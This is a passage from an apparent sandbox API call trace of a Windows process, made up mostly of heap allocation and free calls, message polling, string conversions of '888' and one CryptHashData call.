(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0232.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0232.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0232.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0232.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0232.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0232.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0232.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0232.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0232.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0232.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0232.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0232.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0232.064] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0232.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0232.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0232.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0232.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0232.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0232.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0232.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0232.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0232.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0232.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0232.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0232.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0232.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0232.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0232.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0232.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0232.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0232.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0232.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0232.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0232.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0232.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550b8 [0232.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0232.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0232.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0232.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0232.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0232.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0232.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0232.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.067] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0232.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0232.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0232.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e550a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0232.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.068] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.068] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0232.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0232.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e513a0 [0232.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e513a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0232.069] CryptHashData (hHash=0xa872d0, pbData=0x2e55068, dwDataLen=0x3, dwFlags=0x1) returned 1 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0232.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0232.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0232.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0232.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0232.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0232.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0232.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0232.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0232.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0232.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0232.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0232.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0232.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0232.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0232.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0232.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | 